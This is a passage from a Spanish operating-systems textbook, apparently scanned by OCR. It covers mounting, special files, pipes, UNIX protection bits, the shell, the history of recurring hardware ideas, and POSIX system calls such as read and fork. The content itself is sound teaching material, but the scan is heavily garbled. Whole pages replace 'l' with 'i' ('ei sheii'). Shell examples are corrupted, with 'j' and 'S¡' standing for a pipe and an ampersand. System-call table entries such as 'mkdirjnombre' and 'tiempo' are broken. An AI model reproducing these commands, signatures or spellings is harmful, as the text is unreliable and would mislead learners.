bres de rutas basados en un nombre de unidad o un número: ese sería precisamente el tipo de de¬ 
pendencia de dispositivos que los sistemas operativos deben eliminar. En vez de ello, la llamada al 
sistema mount permite adjuntar el sistema de archivos en CD-ROM al sistema de archivos raíz en 
donde el programa desea que esté. En la figura l-15(b) el sistema de archivos en el CD-ROM se ha 
montado en el directorio b, con lo cual se permite el acceso a los archivos/b/x y /b/y. Si el directo¬ 
rio b tuviera archivos, éstos no estarían accesibles mientras el CD-ROM estuviera montado, debi¬ 
do a que/b haría referencia al directorio raíz del CD-ROM (el hecho de no poder acceder a estos 
archivos no es tan grave como parece: los sistemas de archivos casi siempre se montan en directo¬ 
rios vacíos). Si un sistema contiene varios discos duros, todos se pueden montar en un solo árbol 
también. 
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Raíz 


CD-ROM 



Figura 1.15. (a) Antes de montarse, los archivos en el CD-ROM no están accesibles, 
(b) Después de montarse, forman parte de la jerarquía de archivos. 


Otro concepto importante en UNIX es el archivo especial. Los archivos especiales se propor¬ 
cionan para poder hacer que los dispositivos de E/S se vean como archivos. De esta forma se pue¬ 
de leer y escribir en ellos utilizando las mismas llamadas al sistema que se utilizan para leer y 
escribir en archivos. Existen dos tipos de archivos especiales: archivos especiales de bloque y ar¬ 
chivos especiales de carácter. Los archivos especiales de bloque se utilizan para modelar disposi¬ 
tivos que consisten en una colección de bloques direccionables al azar, tales como los discos. Al 
abrir un archivo especial de bloque y leer, por decir, el bloque 4, un programa puede acceder de ma¬ 
nera directa al cuarto bloqueen el dispositivo sin importar la estructura del sistema de archivos que 
contenga. De manera similar, los archivos especiales de carácter se utilizan para modelar impreso¬ 
ras, módems y otros dispositivos que aceptan o producen como salida un flujo de caracteres. Por 
convención, los archivos especiales se mantienen en el directorio /dev. Por ejemplo, /dev/lp podría 
ser la impresora (a la que alguna vez se le llamó impresora de línea). 

La última característica que veremos en esta descripción general está relacionada con los pro¬ 
cesos y los archivos: los canales. Un canal (pipe) es un tipo de pseudoarchivo que puede utilizar¬ 
se para conectar dos procesos, como se muestra en la figura 1-16. Si los procesos A y B desean 
comunicarse mediante el uso de un canal, deben establecerlo por adelantado. Cuando el proceso A 
desea enviar datos al proceso B, escribe en el canal como si fuera un archivo de salida. De hecho, 
la implementación de un canal es muy parecida a la de un archivo. El proceso B puede leer los da¬ 
tos a través del canal, como si fuera un archivo de entrada. Por ende, la comunicación entre proce¬ 
sos en UNIX tiene una apariencia muy similar a las operaciones comunes de lectura y escritura en 
los archivos. Y por si fuera poco, la única manera en que un proceso puede descubrir que el archi¬ 
vo de salida en el que está escribiendo no es en realidad un archivo sino un canal, es mediante una 
llamada al sistema especial. Los sistemas de archivos son muy importantes. En los capítulos 4,10 
y 11 hablaremos mucho más sobre ellos. 

1.5.4 Entrada/salida 

Todas las computadoras tienen dispositivos físicos para adquirir entrada y producir salida. Después 
de todo, ¿qué tendría de bueno una computadora si los usuarios no pudieran indicarle qué debe ha¬ 
cer y no pudieran obtener los resultados una vez que realizara el trabajo solicitado? Existen muchos 
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Proceso Proceso 



Figura 1-16. Dos procesos conectados mediante un canal. 

tipos de dispositivos de entrada y de salida, incluyendo teclados, monitores, impresoras, etcétera. 
Es responsabilidad del sistema operativo administrar estos dispositivos. 

En consecuencia, cada sistema operativo tiene un subsistema de E/S para administrar sus dis¬ 
positivos de E/S. Parte del software de E/S es independiente de los dispositivos, es decir, se aplica 
a muchos o a todos los dispositivos de E/S por igual. Otras partes del software, como los drivers de 
dispositivos, son específicas para ciertos dispositivos de E/S. En el capítulo 5 analizaremos el soft¬ 
ware de E/S. 

1.5.5 Protección 

Las computadoras contienen grandes cantidades de información que los usuarios comúnmente de¬ 
sean proteger y mantener de manera confidencial. Esta información puede incluir mensajes de co¬ 
rreo electrónico, planes de negocios, declaraciones fiscales y mucho más. Es responsabilidad del 
sistema operativo administrar la seguridad del sistema de manera que los archivos, por ejemplo, só¬ 
lo sean accesibles para los usuarios autorizados. 

Como un ejemplo simple, sólo para tener una idea de cómo puede funcionar la seguridad, con¬ 
sidere el sistema operativo UNIX. Los archivos en UNIX están protegidos debido a que cada uno 
recibe un código de protección binario de 9 bits. El código de protección consiste en tres campos 
de 3 bits, uno para el propietario, uno para los demás miembros del grupo del propietario (el admi¬ 
nistrador del sistema divide a los usuarios en grupos) y uno para todos los demás. Cada campo tie¬ 
ne un bit para el acceso de lectura, un bit para el acceso de escritura y un bit para el acceso de 
ejecución. Estos 3 bits se conocen como los bits rwx. Por ejemplo, el código de protección rwxr- 
x-x indica que el propietario puede leer (r), escribir (w) o ejecutar (x) el archivo, otros miembros 
del grupo pueden leer o ejecutar (pero no escribir) el archivo y todos los demás pueden ejecutarlo 
(pero no leer ni escribir). Para un directorio, x indica el permiso de búsqueda. Un guión corto indi¬ 
ca que no se tiene el permiso correspondiente. 

Además de la protección de archivos, existen muchas otras cuestiones de seguridad. Una de 
ellas es proteger el sistema de los intrusos no deseados, tanto humanos como no humanos (por 
ejemplo, virus). En el capítulo 9 analizaremos varias cuestiones de seguridad. 

1.5.6 El Shell 

El sistema operativo es el código que lleva a cabo las llamadas al sistema. Los editores, compila¬ 
dores, ensambladores, enlazadores e intérpretes de comandos en definitiva no forman parte del sis¬ 
tema operativo, aun cuando son importantes y útiles. Con el riesgo de confundir un poco las cosas, 
en esta sección describiremos brevemente el intérprete de comandos de UNIX, conocido como 
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Shell. Aunque no forma parte del sistema operativo, utiiiza con frecuencia muchas características 
dei mismo y, por ende, sirve como un buen ejempio de ia forma en que se pueden utiiizar ias iia- 
madas ai sistema. También es i a interfaz principai entre un usuario sentado en su terminai y ei sis¬ 
tema operativo, a menos que ei usuario esté usando una interfaz gráfica de usuario. Existen muchos 
sheiis, inciuyendo sh, csh, ksh y bash. Todos eiios soportan ia funcionaiidad antes descrita, que se 
deriva dei sheii originai (sh). 

Cuando cuaiquier usuario inicia sesión, se inicia un sheii. Ei sheii tiene ia terminai como en¬ 
trada estándar y saiida estándar. Empieza por escribir ei indicador de comandos (prompt), un ca¬ 
rácter tai como un signo de dóiar, que indica ai usuario que ei sheii está esperando aceptar un 
comando. Por ejempio, si ei usuario escribe 

date 

ei sheii crea un proceso hijo y ejecuta ei programa date como ei hijo. M ientras se ejecuta ei proce¬ 
so hijo, ei sheii espera a que termine. Cuando ei hijo termina, ei sheii escribede nuevo ei indicador 
y trata de ieer ia siguiente iínea de entrada. 

Ei usuario puede especificar que ia saiida estándar sea redirigida a un archivo, por ejempio: 
date >archivo 

De manera simiiar, i a entrada estándar se puede redirigir, como en: 
sort <archivol >archivo2 

con io cuai se invoca ei programa sort con ia entrada que se recibe dei archivol y ia saiida se envía 
ai archivo2. 

La saiida de un programa se puede utiiizar como entrada para otro, si se conectan mediante un 
canai. Así: 

cat archivol archivo2 archivos j sort >/dev/lp 

invoca ai programa cat para concatenar tres archivos y enviar ia saiida a sort para ordenar todas ias 
iíneas en orden aifabético. La saiida de sort se redirige ai archivo /dev/ip, que por io generai es ia 
impresora. 

Si un usuario coioca ei signo & después de un comando, ei sheii no espera a que se compiete. 
En vez de eiio, proporciona un indicador de comandos de inmediato. En consecuencia: 

cat archivol archivo2 archivos | sort >/dev/lp S¡ 

inicia ei comando sort como un trabajo en segundo piano y permite ai usuario continuar su trabajo 
de manera normai mientras ei ordenamiento se iieva a cabo. Ei sheii tiene otras características 
interesantes, que no describiremos aquí porfaita de espacio. La mayoría de ios iibrosen UNIX des¬ 
criben ei sheii hasta cierto grado (por ejempio, Kernighan y Pike, 1984; Kochan y Wood, 1990; M e- 
dinets, 1999; Newham y Rosenbiatt, 1998; y Robbins, 1999). 

Actuaimente, muchas computadoras personaies utiiizan una GUI. De hecho, la GUI es sólo un 
programa que se ejecuta encima del sistema operativo, como un sheii. En los sistemas Linux, este 
hecho se hace obvio debido a que el usuario tiene una selección de (por lo menos) dos GUIs: Gno¬ 
mo y K DE o ninguna (se utiliza una ventana de terminal en X11). En Windows también es posible 
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reemplazar el escritorio estándar de ia GUI (Windows Expiorer) con un programa distinto, para io 
cuai se modifican ciertos vaiores en ei registro, aunque pocas personas hacen esto. 

1.5.7 La ontogenia recapitula la filogenia 

Después de que se pubiicó ei iibro de Charies Darwin tituiado Ei origen de ias especies, ei zoó- 
iogo aiemán Ernst Haeckei deciaró que "ia ontogenia recapituia ia fiiogenia". Lo que quiso decir 
fue que ei desarroiio de un embrión (ontogenia) repite (es decir, recapituia) ia evoiución de ias es¬ 
pecies (fiiogenia). En otras paiabras, después de ia fertiiización un óvuio humano pasa a través de 
ias etapas de ser un pez, un cerdo y así en io sucesivo, hasta convertirse en un bebé humano. Los 
bióiogos modernos consideran esto como una simpiificación burda, pero aún así tiene cierto grado 
de verdad. 

Aigo anáiogo ha ocurrido en ia industria de ias computadoras. Cada nueva especie (mainfra- 
me, minicomputadora, computadora personai, computadora de boisiiio, computadora de sistema 
integrado, tarjeta inteiigente, etc.) parece pasar a través dei desarroiio que hicieron sus ancestros, 
tanto en hardware como en software. A menudo oividamos que ia mayor parte de io que ocurre en 
ei negocio de ias computadoras y en muchos otros campos está controiado por ia tecnoiogía. La 
razón por ia que ios antiguos romanos no tenían autos no es que Íes gustara caminar mucho; se de¬ 
bió a que no sabían construidos. Las computadoras personaies existen no debido a que miiiones 
de personas tienen un deseo reprimido durante sigios de poseer una computadora, sino a que 
ahora es posibie fabricarías a un costo económico. A menudo oividamos qué tanto afecta ia 
tecnoiogía a nuestra visión de ios sistemas y vaie ia pena refiexionar sobre este punto de vez en 
cuando. 

En especiai, con frecuencia ocurre que un cambio en ia tecnoiogía hace que una idea se vuei- 
va obsoieta y desaparece con rapidez. Sin embargo, otro cambio en ia tecnoiogía podría reviviría de 
nuevo. Esto es en especiai verdadero cuando ei cambio tiene que ver con ei rendimiento reiativo 
de distintas partes dei sistema. Por ejempio, cuando ias CPU s se voivieron mucho más rápidas que 
ias memorias, ias cachés tomaron importancia para agiiizar ia memoria "ienta". Si aigún día ia nue¬ 
va tecnoiogía de memoria hace que ias memorias sean mucho más rápidas que ias CPU s, ias cachés 
desaparecerán. Y si una nueva tecnoiogía de CPUs ias hace más rápidas que ias memorias de nue¬ 
vo, ias cachés voiverán a aparecer. En bioiogía, ia extinción es para siempre, pero en ia ciencia 
computacionai, aigunas veces sóio es durante unos cuantos años. 

Como consecuencia de esta transiten edad, en este iibro anaiizaremos de vez en cuando con¬ 
ceptos "obsoietos", es decir, ideas que no son óptimas con ia tecnoiogía actuai. Sin embargo, ios 
cambios en ia tecnoiogía pueden traer de nuevo aigunos de ios denominados "conceptos obsoietos". 
Por esta razón, es importante comprender por qué un concepto es obsoieto y qué cambios en ei en¬ 
torno pueden hacer que vueiva de nuevo. 

Para aciarar aún más este punto consideremos un ejempio simpie. Las primeras computadoras 
tenían conjuntos de instrucciones cabieados de forma fija. Las instrucciones se ejecutaban directa¬ 
mente por ei hardware y no se podían modificar. Después iiegó ia microprogramación (primero se 
introdujo en gran escaia con ia IBM 360), en la que un intérprete subyacente ejecutaba las "instruc¬ 
ciones de hardware" en el software. La ejecución de instrucciones fijas se volvió obsoleta. Pero es¬ 
to no era lo bastante flexible. Después se inventaron las computadoras RISC y la microprogramación 
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(es decir, la ejecución interpretada) se volvió obsoleta, debido a que la ejecución directa era más ve¬ 
loz. Ahora estamos viendo el resurgimiento de la interpretación en forma de applets de java que se 
envían a través de Internet y se interpretan al momento de su llegada. La velocidad de ejecución no 
siempre es crucial, debido a que los retrasos en la red son tan grandes que tienden a dominar. Por en¬ 
de, el péndulo ha oscilado varias veces entre la ejecución directa y la interpretación y puede volver 
a oscilar de nuevo en el futuro. 

M emorias extensas 

A hora vamos a examinar algunos desarrollos históricos en el hardware y la forma en que han afec¬ 
tado al software repetidas veces. Las primeras mainframes tenían memoria limitada. Una IBM 
7090 o 7094 completamente equipada, que fungió como rey de la montaña desde finales de 1959 
hasta 1964, tenía cerca de 128 KB de memoria. En su mayor parte se programaba en lenguaje en¬ 
samblador y su sistema operativo estaba escrito en lenguaje ensamblador también para ahorrar la 
valiosa memoria. 

A medida que pasaba el tiempo, los compiladores para lenguajes como FORTRAN y CO¬ 
BOL se hicieron lo bastante buenos como para que el lenguaje ensamblador se hiciera obsoleto. 
Pero cuando se liberó al mercado la primera minicomputadora comercial (PDP-1), sólo tenía 
4096 palabras de 18 bits de memoria y el lenguaje ensamblador tuvo un regreso sorpresivo. Con 
el tiempo, las microcomputadoras adquirieron más memoria y los lenguajes de alto nivel preva¬ 
lecieron. 

Cuando las microcomputadoras llegaron a principios de 1980, las primeras tenían memorias 
de 4 KB y la programación en lenguaje ensamblador surgió de entre los muertos. A menudo, las 
computadoras embebidas utilizaban los mismos chips de CPU que las microcomputadoras (8080, 
Z80y posteriormente8086) y también se programaban en ensamblador al principio. Ahora sus des¬ 
cendientes, las computadoras personales, tienen mucha memoria y se programan en C, C-f-i- y j a- 
va, además de otros lenguajes de alto nivel. Las tarjetas Intel i gentes están pasando por un desarrollo 
similar, aunque más allá de un cierto tamaño, a menudo tienen un intérprete de j ava y ejecutan los 
programas de java en forma interpretativa, en vez de que se compile java al lenguaje máquina de 
la tarjeta inteligente. 

H ardware de protección 

Las primeras mainframes (como la IBM 7090/7094) no tenían hardware de protección, por lo que 
sólo ejecutaban un programa a la vez. Un programa con muchos errores podía acabar con el siste¬ 
ma operativo y hacer que la máquina fallara con facilidad. Con la introducción de la IBM 360, se 
hizo disponible una forma primitiva de protección de hardware y estas máquinas podían de esta for¬ 
ma contener varios programas en memoria al mismo tiempo, y dejarlos que tomaran turnos para 
ejecutarse (multiprogramación). La monoprogramación se declaró obsoleta. 

Por lo menos hasta que apareció la primera minicomputadora (sin hardware de protección) la 
multiprogramación no fue posible. Aunque la PDP-1 y la PDP-8 no tenían hardware de protección, 
en cierto momento se agregó a la PDP-11 dando entrada a la multiprogramación y con el tiempo a 
UNIX. 
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Cuando se construyeron las primeras microcomputadoras, utilizaban el chip de CPU 8080 de 
Intel, que no tenía protección de hardware, por lo que regresamos de vuelta a la monoprograma- 
ción. No fue sino hasta el Intel 80286 que se agregó hardware de protección y se hizo posible la 
multiprogramación. Hasta la fecha, muchos sistemas integrados no tienen hardware de protección 
y ejecutan un solo programa. 

Ahora veamos los sistemas operativos. Al principio, las primeras mainframes no tenían hard¬ 
ware de protección ni soporte para la multiprogramación, por lo que ejecutaban sistemas operativos 
simples que se encargaban de un programa cargado en forma manual a la vez. M ás adelante adqui¬ 
rieron el soporte de hardware y del sistema operativo para manejar varios programas a la vez, des¬ 
pués capacidades completas de tiempo compartido. 

Cuando aparecieron las minicomputadoras por primera vez, tampoco tenían hardware de pro¬ 
tección y ejecutaban un programa cargado en forma manual a la vez, aun cuando la multiprograma¬ 
ción estaba bien establecida en el mundo de las mainframes para ese entonces. Gradualmente 
adquirieron hardware de protección y la habilidad de ejecutar dos o más programas a la vez. Las 
primeras microcomputadoras también fueron capaces de ejecutar sólo un programa a la vez, pero 
más adelante adquirieron la habilidad de la multiprogramación. Las computadoras de bolsillo y las 
tarjetas inteligentes se fueron por la misma ruta. 

En todos los casos, el desarrollo de software se rigió en base a la tecnología. Por ejemplo, las 
primeras microcomputadoras tenían cerca de 4 K B de memoria y no tenían hardware de protección. 
Los lenguajes de alto nivel y la multiprogramación eran demasiado para que un sistema tan peque¬ 
ño pudiera hacerse cargo. A medida que las microcomputadoras evolucionaron en las computado¬ 
ras personales modernas, adquirieron el hardware necesario y después el software necesario para 
manejar características más avanzadas. Es probable que este desarrollo continúe por varios años 
más. Otros campos también pueden tener esta rueda de reencarnaciones, pero en la industria de las 
computadoras parece girar con más velocidad. 

Discos 

Las primeras mainframes estaban en su mayor parte basadas en cinta magnética. Leían un progra¬ 
ma de la cinta, lo compilaban, lo ejecutaban y escribían los resultados de vuelta en otra cinta. No 
había discos ni un concepto sobre el sistema de archivos. Eso empezó a cambiar cuando IBM intro¬ 
dujo el primer disco duro: el RAMAC (RAndoM Access, Acceso aleatorio) en 1956. Ocupaba cer¬ 
ca de 4 metros cuadrados de espacio de piso y podía almacenar 5 millones de caracteres de 7 bits, 
lo suficiente como para una fotografía digital de mediana resolución. Pero con una renta anual de 
35,000 dólares, ensamblar suficientes discos como para poder almacenar el equivalente de un rollo 
de película era en extremo costoso. Con el tiempo los precios disminuyeron y se desarrollaron los 
sistemas de archivos primitivos. 

Uno de los nuevos desarrollos típicos de esa época fue la CDC 6600, introducida en 1964 y 
considerada durante años como la computadora más rápida del mundo. Los usuarios podían crear 
"archivos permanentes" al darles un nombre y esperar que ningún otro usuario hubiera decidido 
también que, por decir, "datos" fuera un nombre adecuado para un archivo. Éste era un directorio 
de un solo nivel. Con el tiempo las mainframes desarrollaron sistemas de archivos jerárquicos com¬ 
plejos, lo cual probablemente culminó con el sistema de archivos M ULTICS. 
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Cuando las minicomputadoras empezaron a usarse, con ei tiempo también tuvieron discos du¬ 
ros. Ei disco estándar en ia PDP-11 cuando se introdujo en 1970 era ei disco RK05, con una capaci¬ 
dad de 2.5 M B, aproximadamente ia mitad dei RAM AC de IBM , pero sólo tenía cerca de 40 cm de 
diámetro y 5 cm de altura. Pero también tenía al principio un directorio de un solo nivel. Cuando lle¬ 
garon las microcomputadoras, CP/M fue al principio el sistema operativo dominante y también so¬ 
portaba un solo directorio en el disco (flexible). 

Memoria virtual 

La memoria virtual (que se describe en el capítulo 3) proporciona la habilidad de ejecutar progra¬ 
mas más extensos que la memoria física de la computadora, llevando y trayendo pedazos entre la 
RAM y el disco. Pasó por un desarrollo similar, ya que apareció primero en las mainframes, des¬ 
pués avanzó a las minis y a las micros. La memoria virtual también permitió la capacidad de ligar 
dinámicamente un programa a una biblioteca en tiempo de ejecución, en vez de compilarlo. M U L- 
TICS fue el primer sistema operativo en tener esta capacidad. Con el tiempo, la idea se propagó des¬ 
cendiendo por toda la línea y ahora se utiliza ampliamente en la mayoría de los sistemas UNIX y 
Windows. 

E n todos estos desarrollos vemos ideas que se inventaron en un contexto y más adelante se des¬ 
cartaron cuando cambió el contexto (la programación en lenguaje ensamblador, la monoprograma- 
ción, los directorios de un solo nivel, etc.) sólo para reaparecer en un contexto distinto, a menudo 
una década más tarde. Por esta razón, en este libro algunas veces vemos ideas y algoritmos que pue¬ 
den parecer atrasados en comparación con las PC de hoy en día con capacidades de gigabytes, pe¬ 
ro que pronto pueden volver en las computadoras incrustadas y las tarjetas inteligentes. 


1.6 LLAMADASAL SISTEMA 

Hemos visto que los sistemas operativos tienen dos funciones principales: proveer abstracciones a 
los programas de usuario y administrar los recursos de la computadora. En su mayor parte, la inte¬ 
racción entre los programas de usuario y el sistema operativo se relaciona con la primera función: 
por ejemplo, crear, escribir, leer y eliminar archivos. La parte de la administración de los recursos 
es en gran parte transparente para los usuarios y se realiza de manera automática. Por ende, la in¬ 
terfaz entre los programas de usuario y el sistema operativo trata principalmente acerca de cómo li¬ 
diar con las abstracciones. Para comprender realmente qué hacen los sistemas operativos, debemos 
examinar esta interfaz con detalle. Las llamadas al sistema disponibles en la interfaz varían de un 
sistema operativo a otro (aunque los conceptos subyacentes tienden a ser similares). 

Por lo tanto, nos vemos obligados a elegir una opción entre 1) generalidades imprecisas ("los 
sistemas operativos tienen llamadas al sistema para leer archivos") y 2) cierto sistema específico 
("UNIX tiene una llamada al sistema conocida como read con tres parámetros: uno para especifi¬ 
car el archivo, uno para decir en dónde se van a colocar los datos y uno para indicar cuantos bytes 
se deben leer"). 

Hemos optado por la última opción; implica más trabajo, pero proporciona una visión más de¬ 
tallada en cuanto a lo que realmente hacen los sistemas operativos. Aunque este análisis se refiere 
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en forma específica a POSIX (Estándar internacional 9945-1) y por ende también a UNIX, System 
V, BSD, Linux, M INIX 3, etc., la mayoría délos demás sistemas operativos modernos tienen llama¬ 
das al sistema que realizan las mismas funciones, incluso si difieren los detalles. Como la verdadera 
mecánica relacionada con la acción de emitir una llamada al sistema es altamente dependiente de 
la máquina y a menudo debe expresarse en código ensamblador, se proporciona una biblioteca 
de procedimientos para hacer que sea posible realizar llamadas al sistema desde programas en C y 
por lo general desde otros lenguajes también. 

Es conveniente tener en cuenta lo siguiente. Cualquier computadora con una sola CPU puede 
ejecutar sólo una instrucción a la vez. Si un proceso está ejecutando un programa de usuario en mo¬ 
do usuario y necesita un servicio del sistema, como leer datos de un archivo, tiene que ejecutar una 
instrucción detrap para transferí reí control al sistema operativo. Después, el sistema operativo ave¬ 
rigua qué es lo que quiere el proceso llamador, para lo cual inspecciona los parámetros. Luego lle¬ 
va a cabo la llamada al sistema y devuelve el control a la instrucción que va después de la llamada 
al sistema. En cierto sentido, realizar una llamada al sistema es como realizar un tipo especial de 
llamada a un procedimiento, sólo que las llamadas al sistema entran al kernel y las llamadas a pro¬ 
cedimientos no. 

Para hacer más entendióle el mecanismo de llamadas al sistema, vamos a dar un vistazo rápi¬ 
do a la llamada al sistema read. Como dijimos antes, tiene tres parámetros: el primero especifica el 
archivo, el segundo apunta al búfer y el tercero proporciona el número de bytes a leer. AI igual que 
casi todas las llamadas al sistema, se invoca desde programas en C mediante una llamada a un pro¬ 
cedimiento de la biblioteca con el mismo nombre que la llamada al sistema: read. Una llamada des¬ 
de un programa en C podría tener la siguiente apariencia: 

cuenta=read(fd, bufer, nbytes); 

La llamada al sistema (y el procedimiento de biblioteca) devuelve el número de bytes que se leen 
en cuenta. Por lo general este valor es el mismo que nbytes pero puede ser más pequeño si, por 
ejemplo, se encuentra el fin de archivo al estar leyendo. 

Si la llamada al sistema no se puede llevar a cabo, ya sea debido a un parámetro inválido o a 
un error del disco, cuenta se establece a -1 y el número de error se coloca en una variable global 
llamada errno. Los programas siempre deben comprobar los resultados de una llamada al sistema 
para ver si ocurrió un error. 

Las llamadas al sistema se llevan a cabo en una serie de pasos. Para que este concepto quede 
más claro, vamos a examinar la llamada read antes descrita. En su preparación para llamar al proce¬ 
dimiento de biblioteca read, que es quien realmente hace la llamada al sistema read, el programa lla¬ 
mador primero mete los parámetros en la pila, como se muestra en los pasos 1 a 3 de la figura 1-17. 

Los compiladores de C y C-I-+ meten los parámetros en la pila en orden inverso por razones 
históricas (esto tiene que ver con hacer que el primer parámetro para printf, la cadena del formato, 
aparezca en la parte superior de la pila). Los parámetros primero y tercero se pasan por valor, pero 
el segundo parámetro se pasa por referencia, lo cual significa que se pasa la dirección del búfer (lo 
cual se indica mediante &), no el contenido del mismo. Después viene la llamada al procedimien¬ 
to de biblioteca (paso 4). Esta instrucción es la instrucción de llamada a procedimiento normal uti¬ 
lizada para llamar a todos los procedimientos. 
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Dirección 
OxFFFFFFFF ^ 


Espacio de usuario < 


Espacio de kernei 
(sistema operativo) 



A Procedimiento 
> de bibiioteca 
J read 


I Programa 
l de usuario 
f iiamando 
a read 


Figura 1-17. Los 11 pasos para realizar la llamada al sistema read(fd, bufen, nbytes). 


El procedimiento de biblioteca (probablemente escrito en lenguaje ensamblador) coloca por lo 
general el número de la llamada al sistema en un lugar en el que el sistema operativo lo espera, como 
en un registro (paso 5). Después ejecuta una instrucción trap para cambiar del modo usuario al 
modo kernei y empezar la ejecución en una dirección fija dentro del núcleo (paso 6). La instrucción 
TRAP en realidad es muy similar a la instrucción de llamada a procedimiento en el sentido en que la 
instrucción que le sigue se toma de una ubicación distante y la dirección de retorno se guarda en 
la pila para un uso posterior. 

Sin embargo, la instrucción trap también difiere de la instrucción de llamada a un procedi¬ 
miento en dos formas básicas. En primer lugar, como efecto secundario, cambia a modo kernei. La 
instrucción de llamada al procedimiento no cambia el modo. En segundo lugar, en vez de dar una 
dirección relativa o absoluta en donde se encuentra el procedimiento, la instrucción trap no puede 
saltar a una dirección arbitraria. Dependiendo de la arquitectura, salta a una ubicación fija, hay un 
campo de 8 bits en la instrucción que proporciona el índice a una tabla en memoria que contiene di¬ 
recciones de salto, o su equivalente. 

El código de kernei que empieza después de la instrucción trap examina el número de llama¬ 
da al sistema y después la pasa al manejador correspondiente de llamadas al sistema, por lo gene¬ 
ral a través de una tabla de apuntadores a manejadoras de llamadas al sistema, indexados en base al 
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número de llamada al sistema (paso 7). En ese momento se ejecuta el manejador de llamadas al 
sistema (paso 8). Una vez que el manejador ha terminado su trabajo, el control se puede regresar 
al procedimiento de biblioteca que está en espacio de usuario, en la instrucción que va después de 
la instrucción trap (paso 9). Luego este procedimiento regresa al programa de usuario en la forma 
usual en que regresan las llamadas a procedimientos (paso 10). 

Para terminar el trabajo, el programa de usuario tiene que limpiar la pila, como lo hace después 
de cualquier llamada a un procedimiento (paso 11). Suponiendo que la pila crece hacia abajo, co¬ 
mo es comúnmente el caso, el código compilado incrementa el apuntador de la pila lo suficiente 
como para eliminar los parámetros que se metieron antes de la llamada a read. Ahora el programa 
es libre de hacer lo que quiera a continuación. 

En el paso 9 anterior, dijimos que "se puede regresar al procedimiento de biblioteca que está 
en espacio de usuario ..." por una buena razón. La llamada al sistema puede bloquear al procedi¬ 
miento llamador, evitando que continúe. Por ejemplo, si trata de leer del teclado y no se ha escrito 
nada aún, el procedimiento llamador tiene que ser bloqueado. En este caso, el sistema operativo 
buscará a su alrededor para ver si se puede ejecutar algún otro proceso a continuación. M ás adelan¬ 
te, cuando esté disponible la entrada deseada, este proceso recibirá la atención del sistema y se lle¬ 
varán a cabo los pasos 9 a 11. 

En las siguientes secciones examinaremos algunas de las llamadas al sistema POSIX de uso 
más frecuente, o dicho en forma más específica, los procedimientos de biblioteca que realizan esas 
llamadas al sistema. POSIX tiene aproximadamente 100 llamadas a procedimientos. Algunas de 
las más importantes se listan en la figura 1-18, agrupadas por conveniencia en cuatro categorías. 
En el texto examinaremos brevemente cada llamada para ver cuál es su función. 

En mayor grado, los servicios ofrecidos por estas llamadas determinan la mayor parte de la la¬ 
bor del sistema operativo, ya que la administración de recursos en las computadoras personales es 
una actividad mínima (por lo menos si se le compara con los equipos grandes que tienen muchos 
usuarios). Los servicios incluyen acciones tal es como crear y terminar procesos, crear, eliminar, leer 
y escribir en archivos, administrar directorios y realizar operaciones de entrada y salida. 

Al margen, vale la pena mencionar que la asignación de las llamadas a procedimientos POSIX 
a llamadas al sistema no es de uno a uno. El estándar POSIX especifica varios procedimientos que 
debe suministrar un sistema que se conforme a este estándar, pero no especifica si deben ser llama¬ 
das al sistema, llamadas a una biblioteca, o algo más. Si un procedimiento puede llevarse a cabo sin 
necesidad de invocar una llamada al sistema (es decir, sin atrapar en el kernel), por lo general se 
realizará en espacio de usuario por cuestión de rendimiento. Sin embargo, la mayoría de los proce¬ 
dimientos POSIX invocan llamadas al sistema, en donde por lo general un procedimiento se asig¬ 
na directamente a una llamada al sistema. En unos cuantos casos, en especial en donde los 
procedimientos requeridos son sólo pequeñas variaciones de algún otro procedimiento, una llama¬ 
da al sistema maneja más de una llamada a la biblioteca. 

1.6.1 Llamadas al sistema para la administración de procesos 

El primer grupo de llamadas en la figura 1-18 se encarga de la administración délos procesos, fork 
es un buen lugar para empezar este análisis, fork es la única manera de crear un nuevo proceso en 
POSIX. Crea un duplicado exacto del proceso original, incluyendo todos los descriptores de archivos. 
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Administración de procesos 


Llamada 

Descripción 

pid =fork() 

Crea un proceso hijo, idéntico al padre 

pid = waitpid(pid, SiStatloc, opciones) 

Espera a que un hijo termine 

s =execve(nombre, argv, entornp) 

Reemplaza la imagen del núcleo de un proceso 

exit(estado) 

Termina la ejecución de un proceso y devuelve el estado 


Administración de archivos 


Llamada 

Descripción 

fd =open(archivo, como, ...) 

Abre un archivo para lectura, escritura o ambas 

s =close(fd) 

Cierra un archivo abierto 

n =read(fd, bufer, nbytes) 

Lee datos de un archivo y los coloca en un búfer 

n =write(fd, bufer, nbytes) 

Escribe datos de un búfer a un archivo 

posición =lseek(fd, desplazamiento, dedonde) 

Desplaza el apuntador del archivo 

s =stat(nombre, &buf) 

Obtiene la información de estado de un archivo 


Administración dei sistema de directorios y archivos 


Llamada 

Descripción 

s = mkdirjnombre, modo) 

Crea un nuevo directorio 

s = rmdir(nombre) 

Elimina un directorio vacío 

s = linkjnombrel, nombre2) 

Crea una nueva entrada llamada nombre2, que apunta 
a nombrel 

s = unlink(nombre) 

Elimina una entrada de directorio 

s = mountjespecial, nombre, bandera) 

Monta un sistema de archivos 

s =umount(especial) 

Desmonta un sistema de archivos 


Liamadas varias 


Llamada 

Descripción 

s =chdir(nombredir) 

Cambia el directorio de trabajo 

s =chmod(nombre, modo) 

Cambia los bits de protección de un archivo 

s =kill(pid, senial) 

Envía una señal a un proceso 

segundos =tiempo(&segundos) 

Obtiene el tiempo transcurrido desde Ene 1,1970 


Figura 1-18. Algunas de las principales llamadas al sistema POSIX. El código de re¬ 
torno s es -1 si ocurrió un error. Los códigos de retorno son: pid es un id de proceso, 
fd es un descriptor de archivo, n es una cuenta de bytes, posición es un desplazamien¬ 
to dentro del archivo y segundos es el tiempo transcurrido. Los parámetros se explican 
en el texto. 
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registros y todo lo demás. Después de fork, el proceso original y la copia (el padre y el hijo) se van 
por caminos separados. Todas las variables tienen valores idénticos al momento de la llamada a 
fork, pero como los datos del padre se copian para crear al hijo, los posteriores cambios 
en uno de ellos no afectarán al otro (el texto del programa, que no se puede modificar, se compar¬ 
te entre el padre y el hijo). La llamada a fork devuelve un valor, que es cero en el hijo e igual al 
identificador del proceso (pid) hijo en el padre. M edianteel uso del PID devuelto, los dos procesos 
pueden ver cuál es el proceso padre y cuál es el proceso hijo. 

En la mayoría de los casos, después de una llamada a fork el hijo tendrá que ejecutar código 
distinto al del padre. Considere el caso del shell: lee un comando de la terminal, llama a fork para 
crear un proceso hijo, espera a que el hijo ejecute el comando y después lee el siguiente comando 
cuando el hijo termina. Para esperar a que el hijo termine, el padre ejecuta una llamada al sistema 
waitpid, la cual sólo espera hasta que el hijo termine (cualquier hijo, si existe más de uno), wait- 
